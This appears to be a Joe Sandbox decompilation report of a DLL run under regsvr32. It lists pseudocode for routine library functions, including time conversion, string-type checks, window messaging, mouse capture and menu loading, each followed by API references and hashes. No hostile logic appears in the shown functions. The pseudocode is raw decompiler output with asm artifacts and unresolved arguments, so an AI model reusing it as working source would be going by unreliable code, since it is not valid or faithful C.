                                                                        								_t123 = _t118;
                                                                        								asm("cdq");
                                                                        								_t105 =  *_t129 - _t67;
                                                                        								__eflags = _t105;
                                                                        								asm("sbb edi, edx");
                                                                        								_v12 = _t105;
                                                                        								_v8 = _t118;
                                                                        								L16:
                                                                        								_t68 = E10019490(_t105, _t123, 0x3c, 0);
                                                                        								__eflags = _t68;
                                                                        								 *_t129 = _t68;
                                                                        								if(_t68 < 0) {
                                                                        									 *_t129 = _t68 + 0x3c;
                                                                        									_v12 = _v12 + 0xffffffc4;
                                                                        									asm("adc dword [ebp-0x4], 0xffffffff");
                                                                        								}
                                                                        								_t69 = E10013780(_v12, _v8, 0x3c, 0);
                                                                        								asm("cdq");
                                                                        								asm("adc edi, edx");
                                                                        								_v12 = _t69 +  *((intOrPtr*)(_t129 + 4));
                                                                        								_v8 = _t118;
                                                                        								_t71 = E10019490(_t69 +  *((intOrPtr*)(_t129 + 4)), _t118, 0x3c, 0);
                                                                        								__eflags = _t71;
                                                                        								 *((intOrPtr*)(_t129 + 4)) = _t71;
                                                                        								if(_t71 < 0) {
                                                                        									 *((intOrPtr*)(_t129 + 4)) = _t71 + 0x3c;
                                                                        									_v12 = _v12 + 0xffffffc4;
                                                                        									asm("adc dword [ebp-0x4], 0xffffffff");
                                                                        								}
                                                                        								_t72 = E10013780(_v12, _v8, 0x3c, 0);
                                                                        								asm("cdq");
                                                                        								asm("adc edi, edx");
                                                                        								_v12 = _t72 +  *((intOrPtr*)(_t129 + 8));
                                                                        								_v8 = _t118;
                                                                        								_t74 = E10019490(_t72 +  *((intOrPtr*)(_t129 + 8)), _t118, 0x18, 0);
                                                                        								__eflags = _t74;
                                                                        								 *((intOrPtr*)(_t129 + 8)) = _t74;
                                                                        								if(_t74 < 0) {
                                                                        									 *((intOrPtr*)(_t129 + 8)) = _t74 + 0x18;
                                                                        									_v12 = _v12 + 0xffffffe8;
                                                                        									asm("adc dword [ebp-0x4], 0xffffffff");
                                                                        								}
                                                                        								_t75 = E10013780(_v12, _v8, 0x18, 0);
                                                                        								__eflags = _t118;
                                                                        								_v12 = _t75;
                                                                        								_v8 = _t118;
                                                                        								if(__eflags > 0) {
                                                                        									goto L28;
                                                                        								} else {
                                                                        									if(__eflags < 0) {
                                                                        										L25:
                                                                        										asm("cdq");
                                                                        										_t111 = 7;
                                                                        										 *(_t129 + 0x18) = ( *(_t129 + 0x18) + _t75 + 7) % _t111;
                                                                        										 *((intOrPtr*)(_t129 + 0xc)) =  *((intOrPtr*)(_t129 + 0xc)) + _v12;
                                                                        										_t79 =  *((intOrPtr*)(_t129 + 0xc));
                                                                        										__eflags = _t79;
                                                                        										if(_t79 > 0) {
                                                                        											_t60 = _t129 + 0x1c;
                                                                        											 *_t60 =  *((intOrPtr*)(_t129 + 0x1c)) + _v12;
                                                                        											__eflags =  *_t60;
                                                                        										} else {
                                                                        											 *((intOrPtr*)(_t129 + 0x14)) =  *((intOrPtr*)(_t129 + 0x14)) - 1;
                                                                        											 *((intOrPtr*)(_t129 + 0xc)) = _t79 + 0x1f;
                                                                        											 *((intOrPtr*)(_t129 + 0x1c)) = 0x16c;
                                                                        											 *((intOrPtr*)(_t129 + 0x10)) = 0xb;
                                                                        										}
                                                                        										goto L28;
                                                                        									}
                                                                        									__eflags = _t75;
                                                                        									if(_t75 >= 0) {
                                                                        										goto L28;
                                                                        									}
                                                                        									goto L25;
                                                                        								}
                                                                        							}
                                                                        							_push(_t129);
                                                                        							_t85 = E10019447(0, _t121, _t129, __eflags);
                                                                        							__eflags = _t85;
                                                                        							if(_t85 == 0) {
                                                                        								goto L15;
                                                                        							}
                                                                        							_t113 =  *0x1004cdf0; // 0xfffff1f0
                                                                        							_t86 =  *0x1004cde8; // 0x7080
                                                                        							asm("cdq");
                                                                        							asm("cdq");
                                                                        							asm("sbb edx, edi");
                                                                        							_v12 =  *_t129 - _t86 + _t113;
                                                                        							_v8 = _t118;
                                                                        							 *((intOrPtr*)(_t129 + 0x20)) = 1;
                                                                        							_t123 = _v8;
                                                                        							_t105 = _v12;
                                                                        							goto L16;
                                                                        						} else {
                                                                        							_t90 =  *0x1004cde8; // 0x7080
                                                                        							asm("cdq");
                                                                        							asm("sbb ecx, edx");
                                                                        							_v12 = _t128 - _t90;
                                                                        							_v8 = _t102;
                                                                        							_t92 = E10018BEF( &_v12);
                                                                        							_t138 =  *0x1004cdec; // 0x1
                                                                        							_t129 = _t92;
                                                                        							if(_t138 != 0) {
                                                                        								_push(_t129);
                                                                        								if(E10019447(0, _t121, _t129, _t138) != 0) {
                                                                        									_t94 =  *0x1004cdf0; // 0xfffff1f0
                                                                        									asm("cdq");
                                                                        									_v12 = _v12 - _t94;
                                                                        									asm("sbb [ebp-0x4], edx");
                                                                        									_t129 = E10018BEF( &_v12);
                                                                        									 *((intOrPtr*)(_t129 + 0x20)) = 1;
                                                                        								}
                                                                        							}
                                                                        							L28:
                                                                        							_t63 = _t129;
                                                                        							L30:
                                                                        							return _t63;
                                                                        						}
                                                                        					}
                                                                        					_t135 = _t62;
                                                                        					if(_t62 > 0) {
                                                                        						goto L29;
                                                                        					}
                                                                        					goto L6;
                                                                        				}
                                                                        			}








































                                                                        APIs
                                                                          • Part of subcall function 10018BEF: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10018C61
                                                                        • __allrem.LIBCMT ref: 100135FA
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1001361B
                                                                        • __allrem.LIBCMT ref: 10013637
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1001365A
                                                                        • __allrem.LIBCMT ref: 10013676
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10013699
                                                                          • Part of subcall function 10019447: __lock.LIBCMT ref: 10019455
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__allrem$__lock
                                                                        • String ID:
                                                                        • API String ID: 1282128132-0
                                                                        • Opcode ID: 79635a6e1b24faedbdc9e56547a81b4bda77f7f01b1a66432270eb392f53d183
                                                                        • Instruction ID: c60af2d58918d4078ab001666915cbd37c2ef6b2e54b6b359c888c98dc157d7e
                                                                        • Opcode Fuzzy Hash: 79635a6e1b24faedbdc9e56547a81b4bda77f7f01b1a66432270eb392f53d183
                                                                        • Instruction Fuzzy Hash: CC616DB5A00605EFDB64CF68C88199EBBF5EB44324B21C57EE055EB391E730EE859B40
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 80%
                                                                        			E1001843D(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                        				intOrPtr _t42;
                                                                        				void* _t43;
                                                                        				short* _t45;
                                                                        				int _t58;
                                                                        				int _t62;
                                                                        				long _t65;
                                                                        				int _t67;
                                                                        				void* _t69;
                                                                        				short* _t77;
                                                                        				short* _t78;
                                                                        				int _t79;
                                                                        				short* _t83;
                                                                        				short* _t84;
                                                                        				void* _t85;
                                                                        				short* _t86;
                                                                        				void* _t91;
                                                                        
                                                                        				_t69 = __ecx;
                                                                        				_push(0x1c);
                                                                        				_push(0x10042730);
                                                                        				E10012514(__ebx, __edi, __esi);
                                                                        				_t83 = 0;
                                                                        				_t91 =  *0x1004f740 - _t83; // 0x1
                                                                        				if(_t91 == 0) {
                                                                        					if(GetStringTypeW(1, 0x10042704, 1, _t85 - 0x1c) == 0) {
                                                                        						_t65 = GetLastError();
                                                                        						__eflags = _t65 - 0x78;
                                                                        						if(_t65 == 0x78) {
                                                                        							 *0x1004f740 = 2;
                                                                        						}
                                                                        					} else {
                                                                        						 *0x1004f740 = 1;
                                                                        					}
                                                                        				}
                                                                        				_t42 =  *0x1004f740; // 0x1
                                                                        				if(_t42 == 2 || _t42 == _t83) {
                                                                        					_t67 =  *(_t85 + 0x1c);
                                                                        					__eflags = _t67 - _t83;
                                                                        					if(_t67 == _t83) {
                                                                        						_t67 =  *0x1004f724; // 0x0
                                                                        					}
                                                                        					_t77 =  *(_t85 + 0x18);
                                                                        					__eflags = _t77;
                                                                        					if(_t77 == 0) {
                                                                        						_t77 =  *0x1004f734; // 0x0
                                                                        					}
                                                                        					_t43 = E1001A444(_t67, _t67);
                                                                        					__eflags = _t43 - 0xffffffff;
                                                                        					if(_t43 != 0xffffffff) {
                                                                        						__eflags = _t43 - _t77;
                                                                        						if(__eflags == 0) {
                                                                        							L29:
                                                                        							_t78 = GetStringTypeA(_t67,  *(_t85 + 8),  *(_t85 + 0xc),  *(_t85 + 0x10),  *(_t85 + 0x14));
                                                                        							__eflags = _t83;
                                                                        							if(__eflags != 0) {
                                                                        								_push(_t83);
                                                                        								E100107C8(_t67, _t78, _t83, __eflags);
                                                                        							}
                                                                        							_t45 = _t78;
                                                                        							goto L32;
                                                                        						}
                                                                        						_push(0);
                                                                        						_push(0);
                                                                        						_push(_t85 + 0x10);
                                                                        						_push( *(_t85 + 0xc));
                                                                        						_push(_t43);
                                                                        						_push(_t77);
                                                                        						_t83 = E1001A487(_t67, _t77, _t83, __eflags);
                                                                        						__eflags = _t83;
                                                                        						if(_t83 == 0) {
                                                                        							goto L25;
                                                                        						}
                                                                        						 *(_t85 + 0xc) = _t83;
                                                                        						goto L29;
                                                                        					} else {
                                                                        						goto L25;
                                                                        					}
                                                                        				} else {
                                                                        					if(_t42 != 1) {
                                                                        						L25:
                                                                        						_t45 = 0;
                                                                        						L32:
                                                                        						return E1001254F(_t45);
                                                                        					}
                                                                        					 *(_t85 - 0x24) = _t83;
                                                                        					 *(_t85 - 0x20) = _t83;
                                                                        					if( *(_t85 + 0x18) == _t83) {
                                                                        						_t62 =  *0x1004f734; // 0x0
                                                                        						 *(_t85 + 0x18) = _t62;
                                                                        					}
                                                                        					_t79 = MultiByteToWideChar( *(_t85 + 0x18), 1 + (0 |  *((intOrPtr*)(_t85 + 0x20)) != _t83) * 8,  *(_t85 + 0xc),  *(_t85 + 0x10), _t83, _t83);
                                                                        					 *(_t85 - 0x28) = _t79;
                                                                        					if(_t79 == 0) {
                                                                        						goto L25;
                                                                        					} else {
                                                                        						 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
                                                                        						_t68 = _t79 + _t79;
                                                                        						E10010B20(_t79 + _t79 + 0x00000003 & 0xfffffffc, _t69);
                                                                        						 *(_t85 - 0x18) = _t86;
                                                                        						_t84 = _t86;
                                                                        						 *(_t85 - 0x2c) = _t84;
                                                                        						E10011C50(_t84, 0, _t79 + _t79);
                                                                        						 *(_t85 - 4) =  *(_t85 - 4) | 0xffffffff;
                                                                        						_t99 = _t84;
                                                                        						if(_t84 != 0) {
                                                                        							L15:
                                                                        							_t58 = MultiByteToWideChar( *(_t85 + 0x18), 1,  *(_t85 + 0xc),  *(_t85 + 0x10), _t84, _t79);
                                                                        							if(_t58 != 0) {
                                                                        								 *(_t85 - 0x24) = GetStringTypeW( *(_t85 + 8), _t84, _t58,  *(_t85 + 0x14));
                                                                        							}
                                                                        							_t102 =  *(_t85 - 0x20);
                                                                        							if( *(_t85 - 0x20) != 0) {
                                                                        								_push(_t84);
                                                                        								E100107C8(_t68, _t79, _t84, _t102);
                                                                        							}
                                                                        							_t45 =  *(_t85 - 0x24);
                                                                        							goto L32;
                                                                        						} else {
                                                                        							_push(_t79);
                                                                        							_push(2);
                                                                        							_t84 = E1001382A(_t68, _t79, _t84, _t99);
                                                                        							if(_t84 == 0) {
                                                                        								goto L25;
                                                                        							}
                                                                        							 *(_t85 - 0x20) = 1;
                                                                        							goto L15;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        			}




















                                                                        APIs
                                                                        • GetStringTypeW.KERNEL32(00000001,10042704,00000001,?,10042730,0000001C,1001294D,00000001,00000020,00000100,?,00000000), ref: 10018461
                                                                        • GetLastError.KERNEL32 ref: 10018473
                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,00000000,10012C1E,00000000,00000000,10042730,0000001C,1001294D,00000001,00000020,00000100,?,00000000), ref: 100184D5
                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,00000000,10012C1E,?,00000000), ref: 10018553
                                                                        • GetStringTypeW.KERNEL32(00000000,?,00000000,?,?,00000000), ref: 10018565
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharMultiStringTypeWide$ErrorLast
                                                                        • String ID:
                                                                        • API String ID: 3581945363-0
                                                                        • Opcode ID: c5b59c8c516efa9e1f4051a0dd57c54a1c21c008c676a274ba4cfa4b85049daa
                                                                        • Instruction ID: 357f909d61fdf3067703904fdff93fde9d84214a81f0f6dffe892fe1b28005b1
                                                                        • Opcode Fuzzy Hash: c5b59c8c516efa9e1f4051a0dd57c54a1c21c008c676a274ba4cfa4b85049daa
                                                                        • Instruction Fuzzy Hash: D2418071900629ABEB12CF60CC85A9E3BA6FF497A0F114108F810EE191D735DF91DBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 61%
                                                                        			E1002B9F8(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
                                                                        				intOrPtr _v8;
                                                                        				char _v17;
                                                                        				char _v18;
                                                                        				signed int _v19;
                                                                        				char _v28;
                                                                        				long _v32;
                                                                        				signed int _v36;
                                                                        				char _v52;
                                                                        				intOrPtr _t41;
                                                                        				intOrPtr* _t44;
                                                                        				signed char _t63;
                                                                        				intOrPtr* _t85;
                                                                        				intOrPtr* _t88;
                                                                        
                                                                        				_t41 =  *0x1004c470; // 0x303bb91f
                                                                        				_t88 = __ecx;
                                                                        				_push( &_v28);
                                                                        				_push(_a4);
                                                                        				_v8 = _t41;
                                                                        				_push(0x417);
                                                                        				 *((intOrPtr*)( *__ecx + 0x110))();
                                                                        				_t44 = _a8;
                                                                        				 *(_t44 + 8) =  *(_t44 + 8) ^ 0x00000004;
                                                                        				_v18 = 0;
                                                                        				_v17 = 0;
                                                                        				 *((char*)(_t44 + 0xa)) = 0;
                                                                        				 *((char*)(_t44 + 0xb)) = 0;
                                                                        				if(E10011FB0(_t44,  &_v28, 0x14) != 0) {
                                                                        					_v36 = E100202AB(_t88);
                                                                        					E100202DF(_t88, 0x10000000, 0, 0);
                                                                        					 *((intOrPtr*)( *_t88 + 0x110))(0x416, _a4, 0, __edi);
                                                                        					_v32 = SendMessageA( *(_t88 + 0x1c), 0x43d, 0, 0);
                                                                        					SendMessageA( *(_t88 + 0x1c), 0xb, 0, 0);
                                                                        					SendMessageA( *(_t88 + 0x1c), 0x43c, _v32 + 1, 0);
                                                                        					SendMessageA( *(_t88 + 0x1c), 0x43c, _v32, 0);
                                                                        					SendMessageA( *(_t88 + 0x1c), 0xb, 1, 0);
                                                                        					_t85 = _a8;
                                                                        					 *((intOrPtr*)( *_t88 + 0x110))(0x415, _a4, _t85);
                                                                        					E100202DF(_t88, 0, _v36 & 0x10000000, 0);
                                                                        					_t63 =  *((intOrPtr*)(_t85 + 9));
                                                                        					if(((_t63 ^ _v19) & 0x00000001) != 0 || (_t63 & 0x00000001) != 0 &&  *_t85 != _v28) {
                                                                        						_push(1);
                                                                        						_push(0);
                                                                        						goto L7;
                                                                        					} else {
                                                                        						_push( &_v52);
                                                                        						_push(_a4);
                                                                        						_push(0x41d);
                                                                        						if( *((intOrPtr*)( *_t88 + 0x110))() != 0) {
                                                                        							_push(1);
                                                                        							_push( &_v52);
                                                                        							L7:
                                                                        							_t45 = InvalidateRect( *(_t88 + 0x1c), ??, ??);
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return E100117AE(_t45, _v8);
                                                                        			}

















                                                                        APIs
                                                                          • Part of subcall function 100202AB: GetWindowLongA.USER32 ref: 100202B6
                                                                        • SendMessageA.USER32 ref: 1002BA88
                                                                        • SendMessageA.USER32 ref: 1002BA94
                                                                        • SendMessageA.USER32 ref: 1002BAA4
                                                                        • SendMessageA.USER32 ref: 1002BAB2
                                                                        • SendMessageA.USER32 ref: 1002BABC
                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 1002BB26
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$InvalidateLongRectWindow
                                                                        • String ID:
                                                                        • API String ID: 74886174-0
                                                                        • Opcode ID: b589b2aa5c9a58cfbe72108c5627e30e0f5fe5e27cf1599c4597c7e22d4c9a41
                                                                        • Instruction ID: d3f4ff1b3068862bce3741e6c92e476afb765aaf48ff9a7e93f31cae0c4b6ca1
                                                                        • Opcode Fuzzy Hash: b589b2aa5c9a58cfbe72108c5627e30e0f5fe5e27cf1599c4597c7e22d4c9a41
                                                                        • Instruction Fuzzy Hash: D0416CB0600248BFEB11DB94DC95EFEBBB9EF48744F414459FA41AB291C6B0AD45CB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 77%
                                                                        			E10030A77(void* __ecx, intOrPtr __edx) {
                                                                        				intOrPtr _v8;
                                                                        				struct tagMSG _v32;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				void* _t30;
                                                                        				void* _t32;
                                                                        				void* _t34;
                                                                        				void* _t36;
                                                                        				intOrPtr* _t37;
                                                                        				void* _t41;
                                                                        				intOrPtr _t55;
                                                                        				void* _t56;
                                                                        				void* _t57;
                                                                        				void* _t60;
                                                                        				void* _t61;
                                                                        				intOrPtr* _t62;
                                                                        
                                                                        				_t58 = __edx;
                                                                        				_t60 = __ecx;
                                                                        				if(GetCapture() != 0) {
                                                                        					L20:
                                                                        					return 0;
                                                                        				}
                                                                        				E100220EE(_t61, SetCapture( *( *((intOrPtr*)(_t60 + 0x68)) + 0x1c)));
                                                                        				if(E100220EE(_t61, GetCapture()) !=  *((intOrPtr*)(_t60 + 0x68))) {
                                                                        					L19:
                                                                        					E100308EB(_t60, _t72);
                                                                        					goto L20;
                                                                        				} else {
                                                                        					while(GetMessageA( &_v32, 0, 0, 0) != 0) {
                                                                        						_t30 = _v32.message - 0x100;
                                                                        						if(_t30 == 0) {
                                                                        							__eflags =  *((intOrPtr*)(_t60 + 0x88));
                                                                        							if( *((intOrPtr*)(_t60 + 0x88)) != 0) {
                                                                        								E1003075A(_t60, _v32.wParam, 1);
                                                                        							}
                                                                        							__eflags = _v32.wParam - 0x1b;
                                                                        							if(__eflags != 0) {
                                                                        								L18:
                                                                        								_t32 = E100220EE(_t61, GetCapture());
                                                                        								_t72 = _t32 -  *((intOrPtr*)(_t60 + 0x68));
                                                                        								if(_t32 ==  *((intOrPtr*)(_t60 + 0x68))) {
                                                                        									continue;
                                                                        								}
                                                                        							}
                                                                        							goto L19;
                                                                        						}
                                                                        						_t34 = _t30 - 1;
                                                                        						if(_t34 == 0) {
                                                                        							__eflags =  *((intOrPtr*)(_t60 + 0x88));
                                                                        							if(__eflags != 0) {
                                                                        								E1003075A(_t60, _v32.wParam, 0);
                                                                        							}
                                                                        							goto L18;
                                                                        						}
                                                                        						_t36 = _t34 - 0xff;
                                                                        						if(_t36 == 0) {
                                                                        							_t55 = _v32.pt;
                                                                        							_t58 = _v8;
                                                                        							__eflags =  *((intOrPtr*)(_t60 + 0x88));
                                                                        							_push(_t55);
                                                                        							_push(_t55);
                                                                        							_t37 = _t62;
                                                                        							 *_t37 = _t55;
                                                                        							 *((intOrPtr*)(_t37 + 4)) = _v8;
                                                                        							_t56 = _t60;
                                                                        							if( *((intOrPtr*)(_t60 + 0x88)) == 0) {
                                                                        								E1003078E(_t56, 0);
                                                                        							} else {
                                                                        								E100306DB(_t56);
                                                                        							}
                                                                        							goto L18;
                                                                        						}
                                                                        						_t41 = _t36;
                                                                        						if(_t41 == 0) {
                                                                        							__eflags =  *((intOrPtr*)(_t60 + 0x88));
                                                                        							_t57 = _t60;
                                                                        							if(__eflags == 0) {
                                                                        								E10030A33(_t61, __eflags);
                                                                        							} else {
                                                                        								E10030930(_t57, _t58, 0, _t60, __eflags);
                                                                        							}
                                                                        							return 1;
                                                                        						}
                                                                        						if(_t41 == 0) {
                                                                        							goto L19;
                                                                        						}
                                                                        						DispatchMessageA( &_v32);
                                                                        						goto L18;
                                                                        					}
                                                                        					_push(_v32.wParam);
                                                                        					E1003A098();
                                                                        					goto L19;
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Capture$Message$Dispatch
                                                                        • String ID:
                                                                        • API String ID: 3654672037-0
                                                                        • Opcode ID: e6b58cd4b20e416105edfb9c4440ad9ba75aaff5f0d161abc900f8068c81e4c6
                                                                        • Instruction ID: d9b79505f63fc07e8b5b8f3565facbd5cf555a7e12dc77f8d6b56f2636bb58fe
                                                                        • Opcode Fuzzy Hash: e6b58cd4b20e416105edfb9c4440ad9ba75aaff5f0d161abc900f8068c81e4c6
                                                                        • Instruction Fuzzy Hash: 8431B434A02609AFCB63DBB58C65D6FF6E8EF80787F104419B445DA163CB30A980D762
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E1002A1CA(void* __ecx) {
                                                                        				struct HACCEL__* _t25;
                                                                        				void* _t44;
                                                                        				void* _t45;
                                                                        				struct HINSTANCE__* _t46;
                                                                        				struct HINSTANCE__* _t47;
                                                                        				struct HINSTANCE__* _t48;
                                                                        
                                                                        				_t44 = __ecx;
                                                                        				_t40 = __ecx + 0x60;
                                                                        				_t25 =  *(__ecx + 0x60);
                                                                        				_t45 = 0;
                                                                        				if( *((intOrPtr*)(_t25 - 0xc)) == 0) {
                                                                        					_t25 = E10006A60(_t40,  *((intOrPtr*)(__ecx + 0x3c)));
                                                                        				}
                                                                        				if( *(_t44 + 0x44) != _t45 &&  *((intOrPtr*)(_t44 + 0x2c)) == _t45) {
                                                                        					_t48 =  *(E100373B5() + 0xc);
                                                                        					 *((intOrPtr*)(_t44 + 0x2c)) = LoadMenuA(_t48,  *(_t44 + 0x44) & 0x0000ffff);
                                                                        					_t25 = LoadAcceleratorsA(_t48,  *(_t44 + 0x44) & 0x0000ffff);
                                                                        					 *(_t44 + 0x30) = _t25;
                                                                        					_t45 = 0;
                                                                        				}
                                                                        				if( *(_t44 + 0x40) != _t45 &&  *((intOrPtr*)(_t44 + 0x34)) == _t45) {
                                                                        					_t47 =  *(E100373B5() + 0xc);
                                                                        					 *((intOrPtr*)(_t44 + 0x34)) = LoadMenuA(_t47,  *(_t44 + 0x40) & 0x0000ffff);
                                                                        					_t25 = LoadAcceleratorsA(_t47,  *(_t44 + 0x40) & 0x0000ffff);
                                                                        					 *(_t44 + 0x38) = _t25;
                                                                        					_t45 = 0;
                                                                        				}
                                                                        				if( *(_t44 + 0x48) != _t45 &&  *((intOrPtr*)(_t44 + 0x24)) == _t45) {
                                                                        					_t46 =  *(E100373B5() + 0xc);
                                                                        					 *((intOrPtr*)(_t44 + 0x24)) = LoadMenuA(_t46,  *(_t44 + 0x48) & 0x0000ffff);
                                                                        					_t25 = LoadAcceleratorsA(_t46,  *(_t44 + 0x48) & 0x0000ffff);
                                                                        					 *(_t44 + 0x28) = _t25;
                                                                        				}
                                                                        				return _t25;
                                                                        			}

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Load$AcceleratorsMenu
                                                                        • String ID:
                                                                        • API String ID: 144087665-0
                                                                        • Opcode ID: 62af814d51333b06cd62be60a646d7531518e2420bbbd48c9c7e9b7b2b0652c4
                                                                        • Instruction ID: 79ec512449ce6a4c7bf2710ae8ff5bed15bebc86ac40dbf708adfd4365bfde7a
                                                                        • Opcode Fuzzy Hash: 62af814d51333b06cd62be60a646d7531518e2420bbbd48c9c7e9b7b2b0652c4
                                                                        • Instruction Fuzzy Hash: 8821EA75401B18DFC3B0EF6A9940937F3F8FF09651751446FEA8A86912DA36F890DB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E1002B105(struct HWND__* _a4, struct HWND__** _a8) {
                                                                        				struct HWND__* _t7;
                                                                        				void* _t13;
                                                                        				struct HWND__** _t15;
                                                                        				struct HWND__* _t16;
                                                                        				struct HWND__* _t17;
                                                                        				struct HWND__* _t18;
                                                                        
                                                                        				_t18 = _a4;
                                                                        				_t17 = _t18;
                                                                        				if(_t18 != 0) {
                                                                        					L5:
                                                                        					if((GetWindowLongA(_t17, 0xfffffff0) & 0x40000000) == 0) {
                                                                        						L8:
                                                                        						_t16 = _t17;
                                                                        						_t7 = _t17;
                                                                        						if(_t17 == 0) {
                                                                        							L10:
                                                                        							if(_t18 == 0 && _t17 != 0) {
                                                                        								_t17 = GetLastActivePopup(_t17);
                                                                        							}
                                                                        							_t15 = _a8;
                                                                        							if(_t15 != 0) {
                                                                        								if(_t16 == 0 || IsWindowEnabled(_t16) == 0 || _t16 == _t17) {
                                                                        									 *_t15 =  *_t15 & 0x00000000;
                                                                        								} else {
                                                                        									 *_t15 = _t16;
                                                                        									EnableWindow(_t16, 0);
                                                                        								}
                                                                        							}
                                                                        							return _t17;
                                                                        						} else {
                                                                        							goto L9;
                                                                        						}
                                                                        						do {
                                                                        							L9:
                                                                        							_t16 = _t7;
                                                                        							_t7 = GetParent(_t7);
                                                                        						} while (_t7 != 0);
                                                                        						goto L10;
                                                                        					}
                                                                        					_t17 = GetParent(_t17);
                                                                        					L7:
                                                                        					if(_t17 != 0) {
                                                                        						goto L5;
                                                                        					}
                                                                        					goto L8;
                                                                        				}
                                                                        				_t13 = E1002B0CC();
                                                                        				if(_t13 != 0) {
                                                                        					L4:
                                                                        					_t17 =  *(_t13 + 0x1c);
                                                                        					goto L7;
                                                                        				}
                                                                        				_t13 = E10006C53();
                                                                        				if(_t13 != 0) {
                                                                        					goto L4;
                                                                        				}
                                                                        				_t17 = 0;
                                                                        				goto L8;
                                                                        			}










                                                                        APIs
